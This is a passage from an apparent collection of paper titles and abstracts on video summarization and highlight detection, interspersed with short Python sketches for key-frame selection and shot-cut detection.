efficiently detect video scenes. The attention values are then computed and attached to the scenes, clusters, shots, and subshots in a temporal graph. As a result, the temporal graph can inherently describe the evolution and perceptual importance of a video. In our application, video summaries that emphasize both content balance and perceptual quality can be generated directly from a temporal graph that embeds both the structure and attention information. --- paper_title: Low cost soccer video summaries based on visual rhythm paper_content: The visual rhythm is a spatio-temporal sampled representation of video data providing compact information while preserving several types of video events. We exploit these properties in the present work to propose two new low level descriptors for the analysis of soccer videos computed directly from the visual rhythm. The descriptors are related to dominant color and camera motion estimation. The new descriptors are applied in different tasks aiming the analysis of soccer videos such as shot transition detection, shot classification and attack direction estimation. We also present a simple automated soccer summary application to illustrate the use of the new descriptors.
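The visual-rhythm entry above derives dominant-color and camera-motion descriptors from a spatio-temporally sampled image of the video. The sketch below shows one common way to build such a rhythm image (stacking the central pixel column of every frame) together with a crude dominant-color measure based on green dominance; both the sampling pattern and the color test are stand-in assumptions for illustration, not the descriptors defined in the cited work.

import numpy as np

def visual_rhythm(frames):
    """Stack the central pixel column of every RGB frame into one
    (height x time x 3) image, a simple spatio-temporal sampling of the video."""
    cols = [f[:, f.shape[1] // 2, :] for f in frames]   # central column of each frame
    return np.stack(cols, axis=1)

def grass_ratio(rhythm, margin=30):
    """Crude dominant-color descriptor: per-frame fraction of rhythm pixels whose
    green channel clearly dominates both red and blue (a rough grass test)."""
    r = rhythm[..., 0].astype(int)
    g = rhythm[..., 1].astype(int)
    b = rhythm[..., 2].astype(int)
    grass = (g > r + margin) & (g > b + margin)
    return grass.mean(axis=0)     # one value per time column, i.e. per frame

A high grass ratio suggests a long or medium field shot and a low ratio a close-up or crowd shot, which is the kind of cue a shot-classification step can rely on.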
--- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks. Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while the high-level knowledge such as common sense and human perceptual knowledge are encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: MINMAX optimal video summarization paper_content: The need for video summarization originates primarily from a viewing time constraint. A shorter version of the original video sequence is desirable in a number of applications. Clearly, a shorter version is also necessary in applications where storage, communication bandwidth and/or power are limited. In this paper, our work is based on a MINMAX optimization formulation with viewing time, frame skip and bit rate constraints. New metrics for missing frame and video summary distortions are introduced. Optimal algorithm based on dynamic programming is presented along with experimental results. --- paper_title: Video skimming and characterization through the combination of image and language understanding paper_content: Digital video is rapidly becoming important for education, entertainment and a host of multimedia applications. With the size of the video collections growing to thousands of hours, technology is needed to effectively browse segments in a short time without losing the content of the video. We propose a method to extract the significant audio and video information and create a skim video which represents a very short synopsis of the original. The goal of this work is to show the utility of integrating language and image understanding techniques for video skimming by extraction of significant information, such as specific objects, audio keywords and relevant video structure. The resulting skim video is much shorter; where compaction is as high as 20:1, and yet retains the essential content of the original segment. We have conducted a user-study to test the content summarization and effectiveness of the skim as a browsing tool. --- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. 
The algorithm, which escapes the complexity of existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts faster than real time. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stability of the system. --- paper_title: Highlight sound effects detection in audio stream paper_content: This paper addresses the problem of highlight sound effects detection in audio stream, which is very useful in the fields of video summarization and highlight extraction. Unlike research on audio segmentation and classification, this task only locates highlight sound effects in the audio stream. An extensible framework is proposed, and in the current system three sound effects are considered: laughter, applause and cheer, which are tied up with highlight events in entertainment, sports, meetings and home videos. HMMs are used to model these sound effects, and a method based on log-likelihood scores is used to make the final decision. A sound effect attention model is also proposed to extend the general audio attention model for highlight extraction and video summarization. Evaluations on a 2-hour audio database showed very encouraging results. --- paper_title: Semantic video summarization in compressed domain MPEG video paper_content: In this paper, we present a semantic summarization algorithm that interfaces with the metadata and that works in the compressed domain, in particular MPEG-1 and MPEG-2 videos. In enabling a summarization algorithm through high-level semantic content, we try to address two major problems. First, we present the facility provided in the DVA system that allows the semi-automatic creation of this metadata. Second, we address the main point of this system which is the utilization of this metadata to filter out frames, creating an abstract of a video. A summary quality survey indicates that the proposed method performs satisfactorily. --- paper_title: Personalized abstraction of broadcasted American football video by highlight selection paper_content: Video abstraction is defined as creating shorter video clips or video posters from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted American football video.
We first detect significant events in the video stream by matching textual overlays appearing in an image frame with the descriptions of gamestats in which highlights of the game are described. Then, we select highlight shots which should be included in the video abstract from the detected events, reflecting their degree of significance and personal preferences, and generate a video clip by connecting the shots augmented with related audio and text. An hour-length video can be compressed into a minute-length personalized abstract. We experimentally verified the effectiveness of this method by comparison with man-made video abstracts. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100 recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: Classification of self-consumable highlights for soccer video summaries paper_content: An effective scheme for soccer summarization is significant to improve the usage of this massively growing video data. The paper presents an extension to our recent work which proposed a framework to integrate highlights into play-breaks to construct more complete soccer summaries. The current focus is to demonstrate the benefits of detecting some specific audio-visual features during play-break sequences in order to classify highlights contained within them. The main purpose is to generate summaries which are self-consumable individually. To support this framework, the algorithms for shot classification and detection of near-goal and slow-motion replay scenes are described. The results of our experiment using 5 soccer videos (20 minutes each) show the performance and reliability of our framework. --- paper_title: Automatic video summarizing tool using MPEG-7 descriptors for personal video recorder paper_content: We introduce an automatic video summarizing tool (AVST) for a personal video recorder. The tool utilizes MPEG-7 visual descriptors to generate a video index for a summary. The resulting index not only generates a preview of a movie but also allows non-linear access with thumbnails. In addition, the index supports the searching of shots similar to a desired one within saved video sequences. Moreover, simple shot-based video editing can readily be achieved using the generated index. --- paper_title: Personalized video summary using visual semantic annotations and automatic speech transcriptions paper_content: A personalized video summary is dynamically generated in our video personalization and summary system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order to maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions.
Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. The process includes the shot-to-sentence alignment, summary segment selection, and user preference matching and propagation. As a result, the relevant visual shot and audio sentence segments are aggregated and composed into a personalized video summary. --- paper_title: Media content and type selection from always-on wearable video paper_content: A system is described for summarizing head-mounted or hand-carried "always-on" video. The example used is a tourist walking around a historic city with friends and family. The summary consists of a mixture of stills, panoramas and video clips. The system identifies both the scenes to appear in the summary and the media type used to represent them. As there are few shot boundaries in this class of video, the decisions are based on the system's classification of the user's behaviour demonstrated by the motion of the camera, and motion in the scene. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: A fast layout algorithm for visual video summaries paper_content: We created an improved layout algorithm for automatically generating visual video summaries reminiscent of comic book pages. The summaries are comprised of images from the video that are sized according to their importance. The algorithm performs a global optimization with respect to a layout cost function that encompasses features such as the number of resized images and the amount of whitespace in the presentation. The algorithm creates summaries that: always fit exactly into the requested area, are varied by containing few rows with images of the same size, and have little whitespace at the end of the last row. The layout algorithm is fast enough to allow the interactive resizing of the summaries and the subsequent generation of a new layout. 
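Several of the techniques collected above are concrete enough to sketch directly. As one example, the curvature-based key-frame selection described at the beginning of this section (accumulate frame-by-frame differences, then keep the frames where the cumulative-difference curve bends sharply) can be written in a few lines. The following Python sketch assumes grayscale frames supplied as numpy arrays; the discrete second-difference curvature estimate and the mean-plus-one-standard-deviation threshold are illustrative choices, not taken from the cited paper.

```python
import numpy as np

def cumulative_frame_differences(frames):
    """Cumulative sum of mean absolute pixel differences between consecutive frames."""
    diffs = [np.abs(frames[i].astype(float) - frames[i - 1].astype(float)).mean()
             for i in range(1, len(frames))]
    return np.cumsum(diffs)

def curvature_key_frames(frames, threshold=None):
    """Select key frames at high-curvature points of the cumulative-difference curve."""
    curve = cumulative_frame_differences(frames)
    curvature = np.abs(np.diff(curve, n=2))   # discrete second difference as a curvature proxy
    if threshold is None:                     # illustrative adaptive threshold
        threshold = curvature.mean() + curvature.std()
    # +2 roughly realigns the second-difference index with the original frame index
    return [i + 2 for i, c in enumerate(curvature) if c > threshold]

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    # Synthetic clip: three nearly static "shots" with abrupt content changes between them.
    frames = [np.full((48, 64), v, dtype=np.uint8) + rng.integers(0, 5, (48, 64), dtype=np.uint8)
              for v in [20] * 30 + [120] * 30 + [200] * 30]
    print("key frames:", curvature_key_frames(frames))
```

Because both the frame differences and the curvature estimate depend only on a few recent values, the same logic can be applied on the fly while the video is being read, which is the property the cited entry emphasizes.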
--- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: Spatio-temporal quality assessment for home videos paper_content: Compared with the video programs taken by professionals, home videos are always with low-quality content resulted from lack of professional capture skills. In this paper, we present a novel spatio-temporal quality assessment scheme in terms of low-level content features for home videos. In contrast to existing frame-level-based quality assessment approaches, a type of temporal segment of video, sub-shot, is selected as the basic unit for quality assessment. A set of spatio-temporal artifacts, regarded as the key factors affecting the overall perceived quality (i.e. unstableness, jerkiness, infidelity, blurring, brightness and orientation), are mined from each sub-shot based on the particular characteristics of home videos. The relationship between the overall quality metric and these factors are exploited by three different methods, including user study, factor fusion, and a learning-based scheme. To validate the proposed scheme, we present a scalable quality-based home video summarization system, aiming at achieving the best quality while simultaneously preserving the most informative content. A comparison user study between this system and the attention model based video skimming approach demonstrated the effectiveness of the proposed quality assessment scheme. --- paper_title: Video summarization by spatial-temporal graph optimization paper_content: In this paper we present a novel approach for video summarization based on graph optimization. Our approach emphasizes both a comprehensive visual-temporal content coverage and visual coherence of the video summary. The approach has three stages. First, the source video is segmented into video shots, and a candidate shot set is selected from the video shots according to some video features. Second, a dissimilarity function is defined between the video shots to describe their spatial-temporal relation, and the candidate video shot set is modelled into a directional graph. Third, we outline a dynamic programming algorithm and use it to search the longest path in the graph as the final video skimming. A static video summary is generated at the same time. Experimental results show encouraging promises of our approach for video summarization. --- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content . The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. 
The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sports program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer. --- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appearing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation).
The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Dynamic storyboards for video content summarization paper_content: We propose an innovative, general-purpose approach to the selection and hierarchical representation of key frames of a video sequence for video summarization. In the first stage the shot detection module performs the video structural analysis; in the second stage the key frame extraction module creates the visual summary; and in the last stage the summary post-processing module, after a pre-classification aimed at removing meaningless key frames, creates a multilevel storyboard that the user may browse. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques. A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Design and evaluation of a music video summarization system paper_content: We present a system that summarizes the textual, audio, and video information of music videos in a format tuned to the preferences of a focus group of 20 users. First, we analyzed user needs for the content and the layout of the music summaries. Then, we designed algorithms that segment individual song videos from full music video programs by noting changes in color palette, transcript, and audio classification. We summarize each song with automatically selected high level information such as title, artist, duration, title frame, and text as well as audio and visual segments of the chorus.
Our system automatically determines chorus locations with high recall and precision, based on the placement of repeated words and phrases in the text of the song's lyrics. Our Bayesian belief network then selects other significant video and audio content from the multiple media. Overall, we are able to compress content by a factor of 10. Our second user study has identified the principal variations between users in their choices of content desired in the summary, and in their choices of the platforms that should support their viewing. --- paper_title: Auto-summarization of audio-video presentations paper_content: As streaming audio-video technology becomes widespread, there is a dramatic increase in the amount of multimedia content available on the net. Users face a new challenge: How to examine large amounts of multimedia content quickly. One technique that can enable quick overview of multimedia is video summaries; that is, a shorter version assembled by picking important segments from the original. We evaluate three techniques for automatic creation of summaries for online audio-video presentations. These techniques exploit information in the audio signal (e.g., pitch and pause information), knowledge of slide transition points in the presentation, and information about access patterns of previous users. We report a user study that compares automatically generated summaries that are 20%-25% the length of full presentations to author-generated summaries. Users learn from the computer-generated summaries, although less than from authors' summaries. They initially find computer-generated summaries less coherent, but quickly grow accustomed to them. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: Personal video recorders such as recordable-DVD, Blu-ray disc and hard disc recorders have become popular as large-volume storage devices for video/audio content, and a browsing function that can quickly present a desired scene to the user is required as an essential part of such a large-capacity recording/playback system. We propose a highlight scene detection function that uses only audio features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMMs) trained using the MDL criterion. Our computation is carried out directly on the MDCT coefficients from the AC-3 stream, thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: Flashlight and player detection in fighting sport for video summarization paper_content: In this paper, we present a method for generating summary highlights of fighting sport videos using flashlight [N. Benjamas et al., May 2005] and player detection, by detecting frames that contain close-up flashlights and players. The detected flashlights and the distance between players are utilized for efficient summarization of fighting sport videos. The proposed algorithm first detects the players using skin color detection and connected component labeling. Then, the algorithm identifies the relevant frames by calculating the distance between players, that is, the distance from one player to the other.
Our algorithm accurately detects the distance between players, so that it is able to capture inherently important events. --- paper_title: A utility framework for the automatic generation of audio-visual skims paper_content: In this paper, we present a novel algorithm for generating audio-visual skims from computable scenes. Skims are useful for browsing digital libraries, and for on-demand summaries in set-top boxes. A computable scene is a chunk of data that exhibits consistencies with respect to chromaticity, lighting and sound. There are three key aspects to our approach: (a) visual complexity and grammar, (b) robust audio segmentation and (c) a utility model for skim generation. We define a measure of visual complexity of a shot, and map complexity to the minimum time for comprehending the shot. Then, we analyze the underlying visual grammar, since it makes the shot sequence meaningful. We segment the audio data into four classes, and then detect significant phrases in the speech segments. The utility functions are defined in terms of complexity and duration of the segment. The target skim is created using a general constrained utility maximization procedure that maximizes the information content and the coherence of the resulting skim. The objective function is constrained by multimedia synchronization constraints, visual syntax, and penalty functions on audio and video segments. The user study results indicate that the optimal skims show statistically significant differences from other skims at compression rates up to 90%. --- paper_title: Adaptive extraction of highlights from a sport video based on excitement modeling paper_content: This paper addresses the challenge of automatically extracting the highlights from sports TV broadcasts. In particular, we are interested in finding a generic method of highlights extraction, which does not require the development of models for the events that are thought to be interpreted by the users as highlights. Instead, we search for highlights in those video segments that are expected to excite the users most. It is realistic to assume that a highlighting event induces a steady increase in a user's excitement, as compared to other, less interesting events. We mimic the expected variations in a user's excitement by observing the temporal behavior of selected audiovisual low-level features and the editing scheme of a video. Relations between this noncontent information and the evoked excitement are drawn partly from psychophysiological research and partly from analyzing the live-video directing practice. The expected variations in a user's excitement are represented by the excitement time curve, which is subsequently filtered in an adaptive way to extract the highlights in the prespecified total length and in view of the preferences regarding highlight strength: extraction can be performed with variable sensitivity to capture a few "strong" highlights or more "less strong" ones. We evaluate and discuss the performance of our method on the case study of soccer TV broadcasts. --- paper_title: Semantic units detection and summarization of baseball videos paper_content: A framework for analyzing baseball videos and generating game summaries is proposed. Due to the well-defined rules of baseball games, the system efficiently detects semantic units using domain-related knowledge, and therefore automatically discovers the structure of a baseball game.
After extracting the information changes that are caused by some semantic events on the superimposed caption, a rule-based decision tree is applied to detect meaningful events. Only three types of information, including number-of-outs, score, and base occupation status, are taken in the detection process, and thus the framework detects events and produces summarization in an efficient and effective manner. The experimental results show the effectiveness of this framework and some research opportunities about generating semantic-level summary for sports videos. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Information theory-based shot cut/fade detection and video summarization paper_content: New methods for detecting shot boundaries in video sequences and for extracting key frames using metrics based on information theory are proposed. The method for shot boundary detection relies on the mutual information (MI) and the joint entropy (JE) between the frames. It can detect cuts, fade-ins and fade-outs. The detection technique was tested on the TRECVID2003 video test set having different types of shots and containing significant object and camera motion inside the shots. It is demonstrated that the method detects both fades and abrupt cuts with high accuracy. The information theory measure provides us with better results because it exploits the inter-frame information in a more compact way than frame subtraction. It was also successfully compared to other methods published in literature. The method for key frame extraction uses MI as well. We show that it captures satisfactorily the visual content of the shot. --- paper_title: Creating audio keywords for event detection in soccer video paper_content: This paper presents a novel framework called audio keywords to assist event detection in soccer video. Audio keyword is a middle-level representation that can bridge the gap between low-level features and high-level semantics. Audio keywords are created from low-level audio features by using support vector machine learning. The created audio keywords can be used to detect semantic events in soccer video by applying a heuristic mapping. Experiments of audio keywords creation and event detection based on audio keywords have illustrated promising results. According to the experimental results, we believe that audio keyword is an effective representation that is able to achieve more intuitionistic result for event detection in sports video compared with the method of event detection directly based on low-level features. 
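The information-theoretic cut detector described in the entry above admits a compact implementation: estimate the mutual information between the gray-level distributions of consecutive frames and flag a cut wherever it drops far below its recent level. The Python sketch below is a simplified single-channel version that assumes grayscale numpy frames; the running-average threshold is an illustrative stand-in for the decision rule of the cited work, which additionally uses the joint entropy to handle fades.

```python
import numpy as np

def mutual_information(frame_a, frame_b, bins=32):
    """Mutual information between the gray-level distributions of two frames."""
    joint, _, _ = np.histogram2d(frame_a.ravel(), frame_b.ravel(),
                                 bins=bins, range=[[0, 256], [0, 256]])
    pxy = joint / joint.sum()
    px = pxy.sum(axis=1, keepdims=True)
    py = pxy.sum(axis=0, keepdims=True)
    nonzero = pxy > 0
    return float(np.sum(pxy[nonzero] * np.log(pxy[nonzero] / (px @ py)[nonzero])))

def detect_cuts(frames, sensitivity=0.5):
    """Flag a cut where inter-frame MI falls below a fraction of its running mean."""
    mi = np.array([mutual_information(frames[i - 1], frames[i])
                   for i in range(1, len(frames))])
    cuts = []
    for i, value in enumerate(mi):
        local = np.mean(mi[max(0, i - 10):i + 1])   # simple running average
        if value < sensitivity * local:
            cuts.append(i + 1)                      # cut occurs before frame i + 1
    return cuts

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    base_a = rng.integers(0, 256, (48, 64))
    base_b = rng.integers(0, 256, (48, 64))
    shot_a = [np.clip(base_a + rng.integers(-3, 4, base_a.shape), 0, 255) for _ in range(20)]
    shot_b = [np.clip(base_b + rng.integers(-3, 4, base_b.shape), 0, 255) for _ in range(20)]
    print("detected cuts before frames:", detect_cuts(shot_a + shot_b))
```

A gradual transition such as a fade appears as a sustained drift of the mutual information rather than a single sharp dip, which is why the cited method also tracks the joint entropy between frames.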
--- paper_title: Hierarchical video summarization based on context clustering paper_content: A personalized video summary is dynamically generated in our video personalization and summarization system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order to maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. Besides finding the desired contents, the objective is to present a coherent summary. There are diverse methods for creating summaries, and we focus on the challenges of generating a hierarchical video summary based on context information. In our summarization algorithm, three inputs are used to generate the hierarchical video summary output. These inputs are (1) MPEG-7 metadata descriptions of the contents in the server, (2) user preference and usage environment declarations from the user client, and (3) context information including MPEG-7 controlled term list and classification scheme. In a video sequence, descriptions and relevance scores are assigned to each shot. Based on these shot descriptions, context clustering is performed to collect consecutively similar shots to correspond to hierarchical scene representations. The context clustering is based on the available context information, and may be derived from domain knowledge or rules engines. Finally, the selection of structured video segments to generate the hierarchical summary efficiently balances between scene representation and shot selection. --- paper_title: Dynamic video summarization of home video paper_content: An increasing number of people own and use camcorders to make videos that capture their experiences and document their lives. These videos easily add up to many hours of material. Oddly, most of them are put into a storage box and never touched or watched again. The reasons for this are manifold. Firstly, the raw video material is unedited, and is therefore long-winded and lacking visually appealing effects. Video editing would help, but, it is still too time-consuming; people rarely find the time to do it. Secondly, watching the same tape more than a few times can be boring, since the video lacks any variation or surprise during playback. Automatic video abstracting algorithms can provide a method for processing videos so that users will want to play the material more often. However, existing automatic abstracting algorithms have been designed for feature films, newscasts or documentaries, and thus are inappropriate for home video material and raw video footage in general. In this paper, we present new algorithms for generating amusing, visually appealing and variable video abstracts of home video material automatically. They make use of a new, empirically motivated approach, also presented in the paper, to cluster time-stamped shots hierarchically into meaningful units. 
Last but not least, we propose a simple and natural extension of the way people acquire video - so-called on-the-fly annotations - which will allow a completely new set of applications on raw video footage as well as enable better and more selective automatic video abstracts. Moreover, our algorithms are not restricted to home video but can also be applied to raw video footage in general. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: VideoQA: question answering on news video paper_content: When querying a news video archive, the users are interested in retrieving precise answers in the form of a summary that best answers the query. However, current video retrieval systems, including the search engines on the web, are designed to retrieve documents instead of precise answers. This research explores the use of question answering (QA) techniques to support personalized news video retrieval. Users interact with our system, VideoQA, using short natural language questions with implicit constraints on contents, context, duration, and genre of expected videos. VideoQA returns short precise news video summaries as answers. The main contributions of this research are: (a) the extension of QA technology to support QA in news video; and (b) the use of multi-modal features, including visual, audio, textual, and external resources, to help correct speech recognition errors and to perform precise question answering. The system has been tested on 7 days of news video and has been found to be effective. --- paper_title: Event detection in baseball video using superimposed caption recognition paper_content: We have developed a novel system for baseball video event detection and summarization using superimposed caption text detection and recognition. The system detects different types of semantic level events in baseball video including scoring and last pitch of each batter. The system has two components: event detection and event boundary detection. 
Event detection is realized by change detection and recognition of game stat texts (such as text information showing in score box). Event boundary detection is achieved using our previously developed algorithm, which detects the pitch view as the event beginning and nonactive view as potential endings of the event. One unique contribution of the system is its capability to accurately detect the semantic level events by combining video text recognition with camera view recognition. Another unique feature is the real-time processing speed by taking advantage of compressed-domain approaches in part of the algorithms such as caption detection. To the best of our knowledge, this is the first system achieving accurate detection of multiple types of high-level semantic events in baseball videos. --- paper_title: An approach to generating two-level video abstraction paper_content: Video abstraction is a short summary of the content of a longer video document. Most existing video abstraction methods are based on shot-level, which is not sufficient to meaningful browsing and is too fine to users sometimes. In this paper, we propose a novel approach of generating video abstraction at two levels, namely, the shot-level and the scene-level. We put up a method of extracting key frames from shots, according to the content variation of the latter. An updated time-adaptive algorithm is used to group the shots into scene and representative frames are extracted in the region of that scene using the method of generating Minimum Spanning Tree. Key frames and representative frames can represent the content of shots and scenes, respectively. The organized sequences of key frames and representative frames are the two-level video abstraction. Experiments based on real-world movies show that the method above can provide users with better video summary at different levels. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: The CPR model for summarizing video paper_content: Most past work on video summarization has been based on selecting key frames from videos. We propose a model of video summarization based on three important parameters: Priority (of frames), Continuity (of the summary), and non-Repetition (of the summary). In short, a summary must include high priority frames, must be continuous and non-repetitive. An optimal summary is one that maximizes an objective function based on these three parameters. We 